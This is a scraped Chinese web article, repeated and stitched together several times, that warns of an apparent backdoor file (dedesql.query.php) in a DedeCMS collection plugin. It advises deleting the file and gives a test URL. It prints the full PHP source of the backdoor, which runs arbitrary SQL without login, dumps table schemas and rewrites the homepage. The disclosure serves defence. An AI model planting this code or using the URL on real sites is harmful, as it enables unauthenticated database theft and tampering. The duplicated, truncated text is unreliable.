color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo 